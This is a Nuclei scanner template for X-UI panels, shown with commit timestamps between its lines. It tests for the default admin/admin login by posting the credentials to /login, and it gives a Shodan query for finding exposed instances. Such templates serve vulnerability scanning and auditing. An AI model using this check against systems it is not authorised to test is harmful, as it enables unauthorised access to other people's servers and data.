2022-12-23 12:19:49 +00:00
id : xui-weak-login
info :
2023-01-16 17:41:15 +00:00
name : X-UI - Default Login
2022-12-23 12:19:49 +00:00
author : dali
2022-12-24 19:46:52 +00:00
severity : high
description : |
2023-01-16 17:41:15 +00:00
X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
2022-12-23 12:19:49 +00:00
reference :
- https://github.com/vaxilu/x-ui
2022-12-24 19:46:52 +00:00
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
2022-12-23 12:19:49 +00:00
classification :
cwe-id : CWE-798
2022-12-24 19:46:52 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2022-12-24 19:46:52 +00:00
shodan-query : title:"X-UI Login"
2022-12-23 12:19:49 +00:00
tags : x-ui,default-login
2023-04-27 04:28:59 +00:00
http :
2022-12-23 12:19:49 +00:00
- method : POST
path :
2022-12-24 19:46:52 +00:00
- "{{BaseURL}}/login"
2023-10-14 11:27:55 +00:00
2022-12-23 12:19:49 +00:00
headers :
content-type : application/x-www-form-urlencoded
2023-10-14 11:27:55 +00:00
body : "username={{username}}&password={{password}}"
2022-12-29 08:08:46 +00:00
attack : pitchfork
2022-12-23 12:19:49 +00:00
payloads :
username :
- "admin"
password :
- "admin"
2022-12-24 19:49:02 +00:00
2022-12-23 12:19:49 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"success":true'
2022-12-24 19:46:52 +00:00
- type : word
part : header
words :
- 'application/json'
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100e1f36784ffef57d558271751b0e7a92bab17976ca7606e37cc01a6952f9c0b14022058f645f21814ae9bc4b00d071c3bd6027ff97c1ddb010526500e0799955827ad:922c64590222798bb761d5b6d8e72950
